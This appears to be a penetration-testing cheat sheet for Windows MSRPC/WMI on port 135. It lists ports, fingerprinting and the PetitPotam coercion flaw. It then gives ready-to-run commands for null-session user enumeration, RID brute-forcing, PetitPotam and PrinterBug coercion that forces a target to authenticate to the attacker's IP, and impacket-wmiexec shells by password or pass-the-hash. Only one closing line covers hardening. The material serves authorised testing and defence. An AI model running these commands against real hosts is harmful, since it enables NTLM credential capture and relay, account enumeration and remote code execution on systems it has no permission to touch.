MSRPC / WMI
aka RPC, WMI, Endpoint Mapper
Windows RPC endpoint mapper on 135 (plus high dynamic ports). rpcclient enumerates users and shares over a null session, and wmiexec turns a credential into a shell.
Ports
| Port | Proto | Notes |
|---|---|---|
135 | tcp | RPC endpoint mapper |
49152 | tcp | start of the dynamic RPC range (to 65535) |
Fingerprint
- nmap msrpc on 135; impacket-rpcdump lists endpoints
- Often paired with 139/445 on Windows hosts
Default / weak creds
null session (sometimes), or any valid domain credential
Known CVEs
| CVE | Impact |
|---|---|
| PetitPotam / EfsRpc | RPC coercion of machine authentication for NTLM relay |
Exploitation primitives
- rpcclient null session: enumerate users, groups and RID-cycle
- wmiexec / wmiexec.py with a credential or hash for a semi-interactive shell
- RPC coercion (PetitPotam, PrinterBug) to force a host to authenticate to you
Overview
Port 135 is the RPC endpoint mapper that points clients at the dynamic high ports. For an attacker it is a user-enumeration surface (rpcclient) and an execution channel (WMI).
Enumeration
Dump the RPC endpoints:
impacket-rpcdump @<TARGET>Null-session enumerate users:
rpcclient -U "" -N <TARGET>RID-cycle for users (inside rpcclient):
enumdomusersWhen enumdomusers is blocked, brute the RIDs to recover usernames:
lookupsid.py <DOMAIN>/<user>:<pass>@<TARGET>Coercion (force the host to authenticate to you)
PetitPotam (MS-EFSRPC) — relay or capture the machine’s NetNTLM:
python3 PetitPotam.py <YOUR_IP> <TARGET>PrinterBug (MS-RPRN):
python3 printerbug.py <DOMAIN>/<user>:<pass>@<TARGET> <YOUR_IP>Execution
Get a shell with a credential:
impacket-wmiexec <DOMAIN>/<user>:<pass>@<TARGET>Pass-the-hash variant:
impacket-wmiexec -hashes :<NThash> <DOMAIN>/<user>@<TARGET>Hardening
Restrict RPC to trusted hosts, disable null sessions, and patch the coercion vectors (PetitPotam/PrinterBug).